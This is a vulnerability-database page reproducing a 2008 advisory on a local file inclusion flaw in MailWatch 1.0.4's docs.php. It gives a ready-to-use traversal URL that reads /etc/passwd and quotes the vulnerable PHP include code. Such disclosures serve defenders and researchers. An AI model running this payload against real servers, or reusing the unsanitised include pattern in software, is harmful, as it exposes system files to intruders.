Lucene search
+L

mailwatch 1.0.4 - 'doc' Local File Inclusion

🗓️ 24 Sep 2008 00:00:00Reported by dunType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 31 Views

Mailwatch 1.0.4 Local File Inclusion Vulnerability. Script allows inclusion of local files via 'doc' parameter in docs.php

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-5991
24 Sep 200800:00
circl
cve
CVE
CVE-2008-5991
28 Jan 200915:00
cve
cvelist
Cvelist
CVE-2008-5991
28 Jan 200915:00
cvelist
euvd
EUVD
EUVD-2008-5961
7 Oct 202500:30
euvd
nessus
Tenable Nessus
MailWatch for MailScanner mailscanner/docs.php doc Parameter Traversal Local File Inclusion
26 Sep 200800:00
nessus
nvd
NVD
CVE-2008-5991
28 Jan 200915:30
nvd
prion
Prion
Directory traversal
28 Jan 200915:30
prion
  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 ##################################################################
 #  [ mailwatch <= 1.0.4 ]   Local File Inclusion Vulnerability   #
 ##################################################################
 #
 # Script site: http://sourceforge.net/projects/mailwatch/
 #
 # Vuln:
 # http://site.com/[mailwatch-1.0.4]/mailscanner/docs.php?doc=../../../../../../../etc/passwd%00
 #
 #
 # Bug: ./mailwatch-1.0.4/mailscanner/docs.php (lines: 23-34)
 #
 # ...
 #	if (isset($_GET[doc])) {
 #	 include("docs/".$_GET[doc].".html");
 #	} else {
 #	 echo "<TABLE WIDTH=100% CLASS=\"BOXTABLE\">\n";
 #	 echo " <TR>\n";
 #	 echo "  <TD>\n";
 #	 echo "  <H1>Documentation</H1>\n";
 #	 echo "  This page does not require authentication, so you can put links to your site documentation here and allow your users to access it if you wish.";
 #	 echo "  </TD>\n";
 #	 echo " </TR>\n";
 #	 echo "</TABLE>\n";
 #	}
 # ...
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * str0ke * and otherz..
 ###############################################

 [ dun / 2008 ]

*******************************************************************************************

# milw0rm.com [2008-09-24]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.05937
31